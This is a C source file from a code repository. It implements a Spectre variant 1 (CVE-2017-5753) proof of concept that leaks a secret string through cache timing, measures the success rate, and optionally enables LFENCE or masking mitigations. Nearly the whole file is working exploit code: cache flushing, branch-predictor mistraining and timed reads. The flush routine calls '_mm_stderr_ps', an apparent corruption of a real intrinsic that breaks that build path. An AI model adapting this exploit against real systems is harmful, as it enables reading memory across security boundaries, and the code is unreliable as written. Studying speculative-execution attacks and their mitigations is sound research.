3df95552eb
Add JSON output flag : -j v2 segfaults sometimes with O2...
415 lines
12 KiB
C
415 lines
12 KiB
C
/* spectre.c - CVE-2017-5753 user-to-user sucess rate measurement
|
||
*
|
||
* Borrows code from
|
||
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
|
||
* - https://github.com/genua/meltdown
|
||
*
|
||
* Copyright (c) 2022 Samuel AUBERTIN
|
||
*
|
||
* Permission to use, copy, modify, and distribute this software for any
|
||
* purpose with or without fee is hereby granted, provided that the above
|
||
* copyright notice and this permission notice appear in all copies.
|
||
*
|
||
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
|
||
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
|
||
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
|
||
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
|
||
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
|
||
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
|
||
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <stdint.h>
|
||
#include <getopt.h>
|
||
#include <string.h>
|
||
#include <x86intrin.h> /* for rdtscp and clflush */
|
||
|
||
#if defined(__i386__) || defined(__amd64__)
|
||
#define CACHELINE_SIZE 64
|
||
#else
|
||
#error "unsupported architecture"
|
||
#endif
|
||
|
||
#if defined(__SSE__) && !defined(__SSE2__)
|
||
#define NOSSE2
|
||
#endif
|
||
|
||
#ifdef NOSSE2
|
||
#define NORDTSCP
|
||
#define NOMFENCE
|
||
#define NOCLFLUSH
|
||
#endif //NOSSE2
|
||
|
||
#ifndef NORDTSCP
|
||
#define LATENCY 42 + 42
|
||
#else
|
||
#ifndef NOMFENCE
|
||
#define LATENCY 18 + 18
|
||
#endif
|
||
#endif
|
||
|
||
#ifdef MASKING_MITIGATION
|
||
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
|
||
*
|
||
* array_index_mask_nospec() - generate a mask that is ~0UL when the
|
||
* bounds check succeeds and 0 otherwise
|
||
* @index: array element index
|
||
* @size: number of elements in array
|
||
*
|
||
* Returns:
|
||
* 0 - (index < size)
|
||
*/
|
||
static inline unsigned long
|
||
array_index_mask_nospec(
|
||
unsigned long index,
|
||
unsigned long size
|
||
)
|
||
{
|
||
unsigned long mask;
|
||
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
|
||
:"=r" (mask)
|
||
:"g"(size),"r" (index)
|
||
:"cc");
|
||
return mask;
|
||
}
|
||
#endif //MASKING_MITIGATION
|
||
|
||
#ifdef NOCLFLUSH
|
||
#define CACHE_FLUSH_ITERATIONS 2048
|
||
#define CACHE_FLUSH_STRIDE 4096
|
||
|
||
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
|
||
|
||
/* Flush memory using long SSE instructions */
|
||
void
|
||
flush_memory_sse(
|
||
uint8_t * addr
|
||
)
|
||
{
|
||
float * p = (float *)addr;
|
||
float c = 0.f;
|
||
__m128 i = _mm_setr_ps(c, c, c, c);
|
||
|
||
int k, l;
|
||
/* Non-sequential memory addressing by looping through k by l */
|
||
for (k = 0; k < 4; k++)
|
||
for (l = 0; l < 4; l++)
|
||
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
|
||
}
|
||
#endif //NOCLFLUSH
|
||
|
||
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
|
||
|
||
|
||
unsigned int array1_size = 16;
|
||
uint8_t unused1[64];
|
||
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
||
uint8_t unused2[64];
|
||
uint8_t array2[256 * 512];
|
||
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
||
unsigned cache_hit_threshold;
|
||
|
||
|
||
|
||
static inline unsigned
|
||
timed_access(
|
||
volatile uint8_t *addr
|
||
)
|
||
{
|
||
uint64_t t0, t1;
|
||
#pragma GCC diagnostic ignored "-Wuninitialized"
|
||
unsigned int junk = junk;
|
||
#ifndef NORDTSCP
|
||
t0 = __rdtscp(& junk);
|
||
junk |= *addr;
|
||
t1 = __rdtscp(& junk);
|
||
#else
|
||
#ifndef NOMFENCE
|
||
/*
|
||
Since the rdstc instruction isn't serialized, newer processors will try to
|
||
reorder it, ruining its value as a timing mechanism.
|
||
To get around this, we use the mfence instruction to introduce a memory
|
||
barrier and force serialization. mfence is used because it is portable across
|
||
Intel and AMD.
|
||
*/
|
||
_mm_mfence();
|
||
t0 = __rdtsc();
|
||
_mm_mfence();
|
||
junk = * addr;
|
||
_mm_mfence();
|
||
t1 = __rdtsc();
|
||
_mm_mfence();
|
||
|
||
#else
|
||
/*
|
||
The mfence instruction was introduced with the SSE2 instruction set, so
|
||
we have to ifdef it out on pre-SSE2 processors.
|
||
Luckily, these older processors don't seem to reorder the rdtsc instruction,
|
||
so not having mfence on older processors is less of an issue.
|
||
*/
|
||
t0 = __rdtsc();
|
||
junk |= *addr;
|
||
t1 = __rdtsc();
|
||
#endif // NOMFENCE
|
||
#endif // NORDTSCP
|
||
return (unsigned)(t1 - t0 - LATENCY);
|
||
}
|
||
|
||
static void
|
||
calibrate_threshold(
|
||
unsigned int *threshold
|
||
)
|
||
{
|
||
volatile char buf[2 * CACHELINE_SIZE];
|
||
volatile uint8_t *bufp;
|
||
int i;
|
||
const int cnt = 10000;
|
||
uint64_t tcache = 0;
|
||
__attribute__((unused))
|
||
volatile int junk = 0;
|
||
|
||
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
|
||
~(CACHELINE_SIZE - 1)));
|
||
|
||
junk |= *bufp;
|
||
|
||
for (i = 0, tcache = 0; i < cnt; i++) {
|
||
tcache += timed_access(bufp);
|
||
}
|
||
tcache = tcache / cnt;
|
||
|
||
if (threshold != NULL) {
|
||
*threshold = tcache + LATENCY;
|
||
}
|
||
return;
|
||
}
|
||
|
||
void
|
||
victim_function(
|
||
size_t x
|
||
)
|
||
{
|
||
if (x < array1_size) {
|
||
#ifdef LFENCE_MITIGATION
|
||
/*
|
||
* According to Intel et al, the best way to mitigate this is to
|
||
* add a serializing instruction after the boundary check to force
|
||
* the retirement of previous instructions before proceeding to
|
||
* the read.
|
||
* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
|
||
*/
|
||
_mm_lfence();
|
||
#endif
|
||
#ifdef MASKING_MITIGATION
|
||
x &= array_index_mask_nospec(x, array1_size);
|
||
#endif
|
||
temp &= array2[array1[x] * 512];
|
||
}
|
||
}
|
||
|
||
void
|
||
leak(
|
||
size_t malicious_x,
|
||
uint8_t value[2],
|
||
int score[2],
|
||
unsigned cache_hit_threshold
|
||
)
|
||
{
|
||
static int results[256];
|
||
int tries, i, j, mix_i;
|
||
unsigned int junk = 0;
|
||
size_t training_x, x;
|
||
volatile uint8_t *addr;
|
||
|
||
#ifdef NOCLFLUSH
|
||
int junk2 = 0;
|
||
int l;
|
||
(void)junk2;
|
||
#endif
|
||
|
||
for (i = 0; i < 256; i++) {
|
||
results[i] = 0;
|
||
}
|
||
|
||
for (tries = 999; tries > 0; tries--) {
|
||
|
||
#ifndef NOCLFLUSH
|
||
/* Flush array2[256*(0..255)] from cache */
|
||
for (i = 0; i < 256; i++)
|
||
_mm_clflush(&array2[i * 512]);
|
||
#else
|
||
/* Flush array2[256*(0..255)] from cache
|
||
using long SSE instruction several times */
|
||
for (j = 0; j < 16; j++) {
|
||
for (i = 0; i < 256; i++) {
|
||
flush_memory_sse( & array2[i * 512]);
|
||
}
|
||
}
|
||
#endif
|
||
|
||
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
|
||
training_x = tries % array1_size;
|
||
for (j = 29; j >= 0; j--) {
|
||
#ifndef NOCLFLUSH
|
||
_mm_clflush(&array1_size);
|
||
#else
|
||
/* Alternative to using clflush to flush the CPU cache
|
||
* Read addresses at 4096-byte intervals out of a large array.
|
||
* Do this around 2000 times, or more depending on CPU cache size. */
|
||
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
|
||
junk2 = cache_flush_array[l];
|
||
}
|
||
#endif
|
||
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
|
||
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
|
||
/* Avoid jumps in case those tip off the branch predictor */
|
||
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
|
||
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
|
||
x = training_x ^ (x & (malicious_x ^ training_x));
|
||
/* Call the victim! */
|
||
victim_function(x);
|
||
|
||
}
|
||
|
||
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
||
for (i = 0; i < 256; i++) {
|
||
mix_i = ((i * 167) + 13) & 255;
|
||
addr = & array2[mix_i * 512];
|
||
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
|
||
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
||
}
|
||
|
||
/* Locate highest results in j */
|
||
j = -1;
|
||
for (i = 0; i < 256; i++) {
|
||
if (j < 0 || results[i] >= results[j]) {
|
||
j = i;
|
||
}
|
||
}
|
||
if (results[j] >= 3)
|
||
break;
|
||
}
|
||
|
||
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
||
value[0] = (uint8_t) j;
|
||
score[0] = results[j];
|
||
}
|
||
|
||
int
|
||
main(
|
||
int argc,
|
||
char** argv
|
||
)
|
||
{
|
||
int o;
|
||
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
|
||
int i, score[2], len = (int)strlen(secret);
|
||
uint8_t value[2];
|
||
unsigned successes = 0;
|
||
int json = 0;
|
||
|
||
while ((o = getopt(argc, argv, "t:j")) != EOF) {
|
||
switch (o) {
|
||
case 't':
|
||
cache_hit_threshold = atoi(optarg);
|
||
break;
|
||
case 'j':
|
||
json++;
|
||
break;
|
||
default:
|
||
usage:
|
||
fprintf(stderr, "usage: %s [-j] "
|
||
"[-t threshold]\n"
|
||
"\t-j\t\tJSON output\n"
|
||
"\t-t INT\t\tfixed threshold\n", argv[0]);
|
||
return 1;
|
||
}
|
||
}
|
||
if (argc != optind)
|
||
goto usage;
|
||
|
||
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
|
||
argv[0] + 2,
|
||
(int)strlen(secret));
|
||
|
||
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
|
||
|
||
#ifdef NOCLFLUSH
|
||
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
|
||
cache_flush_array[i] = 1;
|
||
}
|
||
#endif
|
||
|
||
for (i = 0; i < (int)sizeof(array2); i++)
|
||
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
|
||
|
||
while (--len >= 0) {
|
||
leak(malicious_x++, value, score, cache_hit_threshold);
|
||
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
||
successes++;
|
||
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
||
} else {
|
||
fprintf(stderr, "\033[31m?\033[0m");
|
||
}
|
||
}
|
||
fprintf(stderr, "\n");
|
||
if (json) {
|
||
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
|
||
#ifndef NORDTSCP
|
||
printf("\"rdtscp\": true, ");
|
||
#else
|
||
printf("\"rdtscp\": false, ");
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
printf("\"mfence\": true, ");
|
||
#else
|
||
printf("\"mfence\": false, ");
|
||
#endif
|
||
#ifndef NOCLFLUSH
|
||
printf("\"clflush\": true ");
|
||
#else
|
||
printf("\"clflush\": false ");
|
||
#endif
|
||
printf("}, \"mitigations\": { ");
|
||
#ifdef LFENCE_MITIGATION
|
||
printf("\"lfence\": true, ");
|
||
#else
|
||
printf("\"lfence\": false, ");
|
||
#endif
|
||
#ifdef MASKING_MITIGATION
|
||
printf("\"masking\": true ");
|
||
#else
|
||
printf("\"masking\": false ");
|
||
#endif
|
||
printf("}, ");
|
||
printf("\"threshold\": %d, ", cache_hit_threshold);
|
||
printf("\"success\": %.0f } }",
|
||
100 * successes / (float)strlen(secret));
|
||
}
|
||
fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
|
||
#ifndef NORDTSCP
|
||
fprintf(stderr, "RDTSCP ");
|
||
#else
|
||
fprintf(stderr, "RDTSC ");
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
fprintf(stderr, "MFENCE ");
|
||
#endif
|
||
#ifndef NOCLFLUSH
|
||
fprintf(stderr, "CLFLUSH ");
|
||
#endif
|
||
#ifdef LFENCE_MITIGATION
|
||
fprintf(stderr, "LFENCE_MITIGATION ");
|
||
#endif
|
||
#ifdef MASKING_MITIGATION
|
||
fprintf(stderr, "MASKING_MITIGATION ");
|
||
#endif
|
||
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
|
||
cache_hit_threshold,
|
||
100 * successes / (float)strlen(secret));
|
||
|
||
return 0;
|
||
}
|